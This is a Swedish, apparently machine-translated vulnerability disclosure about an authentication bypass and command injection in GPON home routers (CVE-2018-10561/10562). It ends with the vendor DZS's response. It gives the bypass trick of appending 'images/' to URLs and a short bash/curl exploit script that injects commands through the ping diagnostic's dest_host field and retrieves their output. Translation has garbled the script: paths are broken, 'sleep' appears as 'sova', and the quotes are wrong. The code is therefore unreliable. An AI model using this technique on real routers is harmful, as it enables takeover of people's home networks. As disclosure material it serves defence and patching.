Kritisk sårbarhet för RCE hittades i över en miljon GPON-hemrutrar


Två viktiga uppdateringar sedan denna rapport publicerades:

  1. Vårt forskargrupp skapade en patch som kan hjälpa påverkade användare. Kontrollera det här
  2. DASAN Zhone Solutions skickade oss sin kommentar till rapporten. Vi bifogar det "som det är" i slutet av denna sida

Översikt:

Vi genomförde en omfattande utvärdering av ett antal GPON-hemmarrutrar. Många routrar använder idag GPON-internet och vi hittade ett sätt att kringgå all autentisering på enheterna (CVE-2018-10.561). Med denna autentiseringsomgång, vi kunde också avslöja en annan sårbarhet för kommandosprutning (CVE-2018-10.562) och köra kommandon på enheten.

Utnyttjande:

Under vår analys av GPON-firmware hittade vi två olika kritiska sårbarheter (CVE-2018-10561 & CVE-2018-10562) som i kombination skulle möjliggöra fullständig kontroll på enheten och därför nätverket. Den första sårbarheten utnyttjar autentiseringsmekanismen för enheten som har en fel. Denna fel tillåter alla angripare att kringgå all autentisering.

Felen kan hittas med HTTP-servrarna, som kontrollerar för specifika sökvägar vid autentisering. Detta gör att angriparen kan omgå autentisering på alla slutpunkter med ett enkelt trick.

Genom att lägga till bilder / till URL: en kan angriparen kringgå slutpunkten.

Detta fungerar på både HTML-sidor och GponForm /

Till exempel genom att infoga

/menu.html?images/
eller
/ GponForm / diag_FORM? bilder /

vi kan hantera enheten.

När vi tittade igenom enhetens funktionaliteter märkte vi att den diagnostiska slutpunkten innehöll ping- och traceroute-kommandona. Det krävde inte mycket för att räkna ut att kommandona kan injiceras av värdparametern.

Eftersom routern sparar pingresultat i / tmp och skickar det till användaren när användaren går igenom /diag.html, är det ganska enkelt att köra kommandon och hämta utdata med sårbarheten för verifiering av bypass.

Vi inkluderar följande basversion av exploateringskoden:
#! / Bin / bash

echo “[+] Skicka kommandot…”
# Vi skickar kommandona med två lägen backtick (`) och semikolon (;) eftersom olika modeller utlöser på olika enheter
curl -k -d “XWebPageName = diag&diag_action = ping&wan_conlist = 0&dest_host = \ '$ 2 \', $ 2&ipv = 0 ”$ 1 / GponForm / diag_Form? images / 2>/ dev / null 1>/ Dev / null
echo “[+] Waiting….”
sova 3
echo “[+] Hämtar ouput….”
curl -k $ 1 / diag.html? images / 2>/ dev / null | grep ‘diag_result =‘ | sed -e 's / \\ n / \ n / g'

Påverkan:

GPON är en typ av passivt optiskt nätverk som använder fiberoptik och är särskilt populärt. När människor använder GPON tillhandahålls routrarna av ISP: er. I videon kan du se det över en miljon människor använder den här typen av nätverkssystem router.

Vi testade denna sårbarhet på många slumpmässiga GPON-routrar och sårbarheten hittades på alla. Eftersom så många människor använder dessa typer av routrar, denna sårbarhet kan resultera i en hel nätverkskompromiss.

rekommendationer:

  1. Kontrollera om din router använder GPON-nätverket.
  2. Var medveten om att GPON-routrar kan hackas och utnyttjas.
  3. Prata med din internetleverantör för att se vad de kan göra för att åtgärda felet.
  4. Varna dina vänner på Facebook (klicka här för att dela) och Twitter (klicka här för att tweeta).

Uppdatering: Uttalande från DZS angående utnyttjande av autentiseringsomgång

DASAN Zhone Solutions, Inc. har undersökt nya medierapporter om att vissa DZS GPON-nätverksgränssnittsenheter (NID), mer känt som routrar, kan vara sårbara för en autentiseringsomkopplingsutnyttjande.

DZS har fastställt att ZNID-GPON-25xx-serien och vissa H640series GPON ONT, när de arbetar med specifika programvaruversioner, påverkas av detta problem. Inga servicekonsekvenser från denna sårbarhet har hittills rapporterats till DZS. Efter en intern utredning har vi fastställt att den potentiella effekten är mycket mer begränsad i omfattning än rapporterad av vpnMentor. Enligt DZS försäljningsregister, i kombination med fältdata som hittills samlats in, har vi uppskattat att antalet GPON ONT-enheter som kan vara potentiellt påverkade vara mindre än 240 000. Med tanke på produkternas relativa mognad i deras livscykel tror vi dessutom att påverkan är begränsad till ännu färre enheter.

Produkthistoria

DZS ZNID-GPON-25xx och vissa H640-serier ONT, inklusive programvaran som introducerade denna sårbarhet, utvecklades av en OEM-leverantör och återförsäljs av DZS. De flesta av dessa produkter designades och släpptes för mer än 9 år sedan och har nu gått förbi sin hållbara livslängd. Eftersom mjukvarusupportkontrakt inte längre erbjuds för de flesta av dessa produkter har vi inte direkt insikt om det totala antalet enheter som fortfarande används aktivt inom fältet.

Upplösning

DZS har informerat alla kunder som köpte dessa modeller om sårbarheten. Vi arbetar med varje kund för att hjälpa dem utvärdera metoder för att lösa problemet för enheter som fortfarande kan installeras i fältet. Det kommer att vara upp till varje kund att ta ställning till hur kunden ska hantera villkoren för deras distribuerade utrustning.

DZS uppdrag är att se till att alla dess lösningar uppfyller de högsta säkerhetsstandarderna i branschen. Vi omfamnar detta, och varje tillfälle, att granska och kontinuerligt förbättra vår säkerhetsdesign och testmetoder.

Brayan Jackson
Brayan Jackson Administrator
Sorry! The Author has not filled his profile.
follow me